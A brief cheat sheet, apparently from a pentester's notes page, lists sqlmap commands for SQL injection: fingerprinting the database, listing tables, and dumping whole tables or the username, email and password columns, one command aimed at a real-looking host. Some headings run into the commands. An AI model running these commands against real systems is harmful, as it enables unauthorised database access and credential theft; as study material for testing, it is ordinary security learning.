SQL Injection with sqlmap
Grabbing the Database software
sqlmap -u example.com/product/19* --bannerwe put star as the vulnerable parameter
sqlmap -r req.txt --current-dbListing Tables
sqlmap -u catalog.sphassets.com/product/19* --tables
or
sqlmap -r request.txt -D social --tablesDump entries from a specific table example
sqlmap -u example.com/product/19* -T users_field_data –dump
Dumping specific columns from a table example
sqlmap -r request.txt -D social -T users -C username,email,password --dumpLast updated